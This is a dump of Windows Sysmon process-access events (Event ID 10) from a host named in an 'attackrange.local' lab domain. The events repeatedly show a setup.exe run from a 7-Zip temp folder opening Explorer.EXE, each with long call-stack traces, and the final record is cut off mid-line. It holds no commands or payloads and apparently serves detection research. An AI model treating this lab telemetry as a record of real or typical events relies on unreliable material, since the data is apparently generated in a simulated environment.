13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\A